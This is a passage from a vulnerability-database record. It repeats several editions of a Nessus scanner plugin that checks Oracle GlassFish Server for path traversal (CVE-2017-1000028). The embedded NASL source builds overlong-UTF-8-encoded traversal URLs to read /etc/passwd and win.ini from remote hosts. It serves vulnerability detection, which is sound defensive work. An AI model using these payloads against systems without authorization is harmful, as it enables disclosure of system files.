[{'.':'%c0%ae', '/':'%c0%af'},\n {'.':'%e0%80%ae', '/':'%c0%af'},\n {'.':'.', '/':'%e0%80%af'},\n {'.':'%f0%80%80%ae', '/':'%e0%80%af'}\n];\nvar file_pats = {\"/etc/passwd\":\"root:.*:0:[01]:\",\n \"/winnt/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\",\n \"/windows/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\"\n};\nvar os = get_kb_item('Host/OS');\n\n# Exploitation check\nif (!empty_or_null(os) && (report_paranoia < 2))\n{\n if (\"Windows\" >< os)\n {\n files = ['/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n }\n else\n {\n files = ['/etc/passwd'];\n paths = ['META-INF'];\n }\n}\nelse\n{\n files = ['/etc/passwd', '/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n}\n\nforeach url (gather_pieces(files:files, paths:paths, payloads:payloads, depth:depth))\n{\n res = get_glassfish_res(url:url, port:port);\n\n foreach file (files)\n if (egrep(pattern:file_pats[file], string:res[2]))\n {\n security_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n extra : 'The following HTTP request was sent:\\n\\n' +\n build_glassfish_url(url:url, port:port) + '\\n\\n' +\n 'The contents of file obtained:\\n\\n' + chomp(res[2])\n );\n exit(0);\n }\n}\n\naudit(AUDIT_LISTEN_NOT_VULN, \"GlassFish Server\", port);\nexit(0);\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:oracle:glassfish_server"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-02T00:39:56", "differentElements": ["cvss2", "cvss3"], "edition": 4}, {"bulletin": {"id": "GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL", "hash": "c71c6088763043c19049922488d52ec856ed82986fe23110bcb650d2cd1c6c5d", "type": "nessus", "bulletinFamily": "scanner", "title": "Oracle GlassFish Server Path Traversal", "description": "The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. \nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.", "published": "2018-05-30T00:00:00", "modified": "2021-07-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://www.tenable.com/plugins/nessus/110192", "reporter": "This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?159578ad"], "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "lastseen": "2021-07-29T00:36:41", "history": [], "viewCount": 142, "enchantments": {"dependencies": {"modified": "2021-07-29T00:36:41", "references": [{"idList": ["UB:CVE-2017-1000028"], "type": "ubuntucve"}, {"idList": ["EDB-ID:45198", "EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "rev": 2}, "score": {"modified": "2021-07-29T00:36:41", "rev": 2, "value": 5.7, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "110192", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110192);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2017-1000028\");\n script_xref(name:\"EDB-ID\", value:\"39441\");\n\n script_name(english:\"Oracle GlassFish Server Path Traversal\");\n script_summary(english:\"Attempts to access arbitrary files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web application server is affected by a path traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. \nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.\");\n # https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904\n script_set_attribute(attribute:\"see_also\",value:\"http://www.nessus.org/u?159578ad\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact to vendor for patch options.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/30\");\n\n script_set_attribute(attribute:\"plugin_type\",value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:glassfish_server\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"glassfish_console_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/glassfish\", \"www/glassfish/console\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"glassfish.inc\");\n\n##\n# Combine payload string for exploitation of issue\n#\n# @param [file:string] target file to read from server\n# @param [path:string] piece of URL that triggers vulnerable Java component\n# @param [payl:array] contains encoding pattern for '.' and '/'\n# @param [depth:int] depth of payloads needed\n#\n# @return string payload to send to the server\n##\nfunction prepare_payload(file, path, payl, depth)\n{\n var i, piece, pieces_of_file;\n var url = '/theme/';\n\n if (empty_or_null(file) || empty_or_null(path) || \n empty_or_null(payl) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n url += path;\n\n # Generate enough encoded /.. sequences \n for (i=0; i<depth; i++)\n url += payl['/'] + payl['.'] + payl['.'];\n\n # Encode / in file name\n pieces_of_file = split(file, sep:'/', keep:false);\n\n for (i=1; i<len(pieces_of_file); i++)\n url += payl['/'] + pieces_of_file[i];\n\n return url;\n}\n\n##\n# Select pieces from input parameters to generate payload\n#\n# @param [files:string] target file to read from server\n# @param [paths:string] piece of URL that triggers vulnerable Java component\n# @param [payloads:array] contains encoding pattern for '.' and '/'\n# @param [depth:int] depth of payloads needed \n#\n# @return list of urls that we have to test\n##\nfunction gather_pieces(files, paths, payloads, depth)\n{\n var file, path, payl;\n var urls_list = make_list();\n\n if (empty_or_null(files) || empty_or_null(paths) || \n empty_or_null(payloads) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n foreach file (files)\n foreach path (paths)\n foreach payl (payloads)\n urls_list[max_index(urls_list)] =\n prepare_payload(file:file, path:path, payl:payl, depth:depth);\n\n return urls_list;\n}\n\n#\n# Main\n#\n\n# Check GlassFish & GlassFish Admin Console\nget_kb_item_or_exit('www/glassfish');\nget_kb_item_or_exit('www/glassfish/console');\n\nvar port = get_glassfish_console_port(default:4848);\n\n# Parameters section\nvar depth = 10;\nvar files, paths, res, url;\nvar vuln, req, file;\nvar payloads = [{'.':'%c0%ae', '/':'%c0%af'},\n {'.':'%e0%80%ae', '/':'%c0%af'},\n {'.':'.', '/':'%e0%80%af'},\n {'.':'%f0%80%80%ae', '/':'%e0%80%af'}\n];\nvar file_pats = {\"/etc/passwd\":\"root:.*:0:[01]:\",\n \"/winnt/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\",\n \"/windows/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\"\n};\nvar os = get_kb_item('Host/OS');\n\n# Exploitation check\nif (!empty_or_null(os) && (report_paranoia < 2))\n{\n if (\"Windows\" >< os)\n {\n files = ['/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n }\n else\n {\n files = ['/etc/passwd'];\n paths = ['META-INF'];\n }\n}\nelse\n{\n files = ['/etc/passwd', '/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n}\n\nforeach url (gather_pieces(files:files, paths:paths, payloads:payloads, depth:depth))\n{\n res = get_glassfish_res(url:url, port:port);\n\n foreach file (files)\n if (egrep(pattern:file_pats[file], string:res[2]))\n {\n security_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n extra : 'The following HTTP request was sent:\\n\\n' +\n build_glassfish_url(url:url, port:port) + '\\n\\n' +\n 'The contents of file obtained:\\n\\n' + chomp(res[2])\n );\n exit(0);\n }\n}\n\naudit(AUDIT_LISTEN_NOT_VULN, \"GlassFish Server\", port);\nexit(0);\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:oracle:glassfish_server"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-29T00:36:41", "differentElements": ["modified"], "edition": 5}, {"bulletin": {"id": "GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL", "hash": "4237e6efc63527c2f59dfefc56e8221d", "type": "nessus", "bulletinFamily": "scanner", "title": "Oracle GlassFish Server Path Traversal", "description": "The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. \nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.", "published": "2018-05-30T00:00:00", "modified": "2021-08-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://www.tenable.com/plugins/nessus/110192", "reporter": "This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?159578ad"], "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "lastseen": "2021-08-01T08:45:20", "history": [], "viewCount": 142, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-1000028"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-1000028"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148892"]}, {"type": "exploitdb", "idList": ["EDB-ID:45196", "EDB-ID:45198"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806848"]}], "modified": "2021-08-01T08:45:20", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-08-01T08:45:20", "rev": 2}}, "objectVersion": "1.6", "pluginID": "110192", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110192);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2017-1000028\");\n script_xref(name:\"EDB-ID\", value:\"39441\");\n\n script_name(english:\"Oracle GlassFish Server Path Traversal\");\n script_summary(english:\"Attempts to access arbitrary files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web application server is affected by a path traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. \nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.\");\n # https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904\n script_set_attribute(attribute:\"see_also\",value:\"http://www.nessus.org/u?159578ad\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact to vendor for patch options.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/30\");\n\n script_set_attribute(attribute:\"plugin_type\",value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:glassfish_server\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"glassfish_console_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/glassfish\", \"www/glassfish/console\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"glassfish.inc\");\n\n##\n# Combine payload string for exploitation of issue\n#\n# @param [file:string] target file to read from server\n# @param [path:string] piece of URL that triggers vulnerable Java component\n# @param [payl:array] contains encoding pattern for '.' and '/'\n# @param [depth:int] depth of payloads needed\n#\n# @return string payload to send to the server\n##\nfunction prepare_payload(file, path, payl, depth)\n{\n var i, piece, pieces_of_file;\n var url = '/theme/';\n\n if (empty_or_null(file) || empty_or_null(path) || \n empty_or_null(payl) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n url += path;\n\n # Generate enough encoded /.. sequences \n for (i=0; i<depth; i++)\n url += payl['/'] + payl['.'] + payl['.'];\n\n # Encode / in file name\n pieces_of_file = split(file, sep:'/', keep:false);\n\n for (i=1; i<len(pieces_of_file); i++)\n url += payl['/'] + pieces_of_file[i];\n\n return url;\n}\n\n##\n# Select pieces from input parameters to generate payload\n#\n# @param [files:string] target file to read from server\n# @param [paths:string] piece of URL that triggers vulnerable Java component\n# @param [payloads:array] contains encoding pattern for '.' and '/'\n# @param [depth:int] depth of payloads needed \n#\n# @return list of urls that we have to test\n##\nfunction gather_pieces(files, paths, payloads, depth)\n{\n var file, path, payl;\n var urls_list = make_list();\n\n if (empty_or_null(files) || empty_or_null(paths) || \n empty_or_null(payloads) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n foreach file (files)\n foreach path (paths)\n foreach payl (payloads)\n urls_list[max_index(urls_list)] =\n prepare_payload(file:file, path:path, payl:payl, depth:depth);\n\n return urls_list;\n}\n\n#\n# Main\n#\n\n# Check GlassFish & GlassFish Admin Console\nget_kb_item_or_exit('www/glassfish');\nget_kb_item_or_exit('www/glassfish/console');\n\nvar port = get_glassfish_console_port(default:4848);\n\n# Parameters section\nvar depth = 10;\nvar files, paths, res, url;\nvar vuln, req, file;\nvar payloads = [{'.':'%c0%ae', '/':'%c0%af'},\n {'.':'%e0%80%ae', '/':'%c0%af'},\n {'.':'.', '/':'%e0%80%af'},\n {'.':'%f0%80%80%ae', '/':'%e0%80%af'}\n];\nvar file_pats = {\"/etc/passwd\":\"root:.*:0:[01]:\",\n \"/winnt/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\",\n \"/windows/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\"\n};\nvar os = get_kb_item('Host/OS');\n\n# Exploitation check\nif (!empty_or_null(os) && (report_paranoia < 2))\n{\n if (\"Windows\" >< os)\n {\n files = ['/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n }\n else\n {\n files = ['/etc/passwd'];\n paths = ['META-INF'];\n }\n}\nelse\n{\n files = ['/etc/passwd', '/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n}\n\nforeach url (gather_pieces(files:files, paths:paths, payloads:payloads, depth:depth))\n{\n res = get_glassfish_res(url:url, port:port);\n\n foreach file (files)\n if (egrep(pattern:file_pats[file], string:res[2]))\n {\n security_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n extra : 'The following HTTP request was sent:\\n\\n' +\n build_glassfish_url(url:url, port:port) + '\\n\\n' +\n 'The contents of file obtained:\\n\\n' + chomp(res[2])\n );\n exit(0);\n }\n}\n\naudit(AUDIT_LISTEN_NOT_VULN, \"GlassFish Server\", port);\nexit(0);\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:oracle:glassfish_server"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-08-01T08:45:20", "differentElements": ["cvss2", "cvss3", "description", "exploitAvailable", "exploitEase", "modified", "references", "solution", "vpr", "vulnerabilityPublicationDate"], "edition": 6}, {"bulletin": {"id": "GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL", "hash": "63fca850c8dac8aa333a38b964277682", "type": "nessus", "bulletinFamily": "scanner", "title": "Oracle GlassFish Server Path Traversal", "description": "The instance of Oracle GlassFish Server running on the remote host is affected by an authenticated and unauthenticated path traversal vulnerability. Remote attacker can exploit this issue, via a specially crafted HTTP request, to access arbitrary files on the remote host.", "published": "2018-05-30T00:00:00", "modified": "2018-06-14T00:00:00", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/110192", "reporter": "This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028", "http://www.nessus.org/u?159578ad"], "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "lastseen": "2021-08-11T13:52:10", "history": [], "viewCount": 142, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-1000028"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-1000028"]}, {"type": "exploitdb", "idList": ["EDB-ID:45196", "EDB-ID:45198"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148892"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806848"]}], "modified": "2021-08-11T13:52:10", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-08-11T13:52:10", "rev": 2}}, "objectVersion": "1.6", "pluginID": "110192", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110192);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2017-1000028\");\n script_xref(name:\"EDB-ID\", value:\"39441\");\n\n script_name(english:\"Oracle GlassFish Server Path Traversal\");\n script_summary(english:\"Attempts to access arbitrary files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web application server is affected by a path traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. \nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.\");\n # https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904\n script_set_attribute(attribute:\"see_also\",value:\"http://www.nessus.org/u?159578ad\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact to vendor for patch options.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/30\");\n\n script_set_attribute(attribute:\"plugin_type\",value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:glassfish_server\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"glassfish_console_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/glassfish\", \"www/glassfish/console\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"glassfish.inc\");\n\n##\n# Combine payload string for exploitation of issue\n#\n# @param [file:string] target file to read from server\n# @param [path:string] piece of URL that triggers vulnerable Java component\n# @param [payl:array] contains encoding pattern for '.' and '/'\n# @param [depth:int] depth of payloads needed\n#\n# @return string payload to send to the server\n##\nfunction prepare_payload(file, path, payl, depth)\n{\n var i, piece, pieces_of_file;\n var url = '/theme/';\n\n if (empty_or_null(file) || empty_or_null(path) || \n empty_or_null(payl) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n url += path;\n\n # Generate enough encoded /.. sequences \n for (i=0; i<depth; i++)\n url += payl['/'] + payl['.'] + payl['.'];\n\n # Encode / in file name\n pieces_of_file = split(file, sep:'/', keep:false);\n\n for (i=1; i<len(pieces_of_file); i++)\n url += payl['/'] + pieces_of_file[i];\n\n return url;\n}\n\n##\n# Select pieces from input parameters to generate payload\n#\n# @param [files:string] target file to read from server\n# @param [paths:string] piece of URL that triggers vulnerable Java component\n# @param [payloads:array] contains encoding pattern for '.' and '/'\n# @param [depth:int] depth of payloads needed \n#\n# @return list of urls that we have to test\n##\nfunction gather_pieces(files, paths, payloads, depth)\n{\n var file, path, payl;\n var urls_list = make_list();\n\n if (empty_or_null(files) || empty_or_null(paths) || \n empty_or_null(payloads) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n foreach file (files)\n foreach path (paths)\n foreach payl (payloads)\n urls_list[max_index(urls_list)] =\n prepare_payload(file:file, path:path, payl:payl, depth:depth);\n\n return urls_list;\n}\n\n#\n# Main\n#\n\n# Check GlassFish & GlassFish Admin Console\nget_kb_item_or_exit('www/glassfish');\nget_kb_item_or_exit('www/glassfish/console');\n\nvar port = get_glassfish_console_port(default:4848);\n\n# Parameters section\nvar depth = 10;\nvar files, paths, res, url;\nvar vuln, req, file;\nvar payloads = [{'.':'%c0%ae', '/':'%c0%af'},\n {'.':'%e0%80%ae', '/':'%c0%af'},\n {'.':'.', '/':'%e0%80%af'},\n {'.':'%f0%80%80%ae', '/':'%e0%80%af'}\n];\nvar file_pats = {\"/etc/passwd\":\"root:.*:0:[01]:\",\n \"/winnt/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\",\n \"/windows/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\"\n};\nvar os = get_kb_item('Host/OS');\n\n# Exploitation check\nif (!empty_or_null(os) && (report_paranoia < 2))\n{\n if (\"Windows\" >< os)\n {\n files = ['/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n }\n else\n {\n files = ['/etc/passwd'];\n paths = ['META-INF'];\n }\n}\nelse\n{\n files = ['/etc/passwd', '/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n}\n\nforeach url (gather_pieces(files:files, paths:paths, payloads:payloads, depth:depth))\n{\n res = get_glassfish_res(url:url, port:port);\n\n foreach file (files)\n if (egrep(pattern:file_pats[file], string:res[2]))\n {\n security_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n extra : 'The following HTTP request was sent:\\n\\n' +\n build_glassfish_url(url:url, port:port) + '\\n\\n' +\n 'The contents of file obtained:\\n\\n' + chomp(res[2])\n );\n exit(0);\n }\n}\n\naudit(AUDIT_LISTEN_NOT_VULN, \"GlassFish Server\", port);\nexit(0);\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:oracle:glassfish_server"], "solution": "Contact to vendor for patch options.", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {"risk factor": "Medium", "score": "4.4"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": null, "vulnerabilityPublicationDate": "2017-07-17T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-11T13:52:10", "differentElements": ["nessusSeverity"], "edition": 7}], "viewCount": 148, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-1000028"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-1000028"]}, {"type": "exploitdb", "idList": ["EDB-ID:45198", "EDB-ID:45196"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148892"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806848"]}], "modified": "2021-08-19T12:32:04", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-08-19T12:32:04", "rev": 2}}, "objectVersion": "1.6", "pluginID": "110192", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110192);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2017-1000028\");\n script_xref(name:\"EDB-ID\", value:\"39441\");\n\n script_name(english:\"Oracle GlassFish Server Path Traversal\");\n script_summary(english:\"Attempts to access arbitrary files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web application server is affected by a path traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. \nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.\");\n # https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904\n 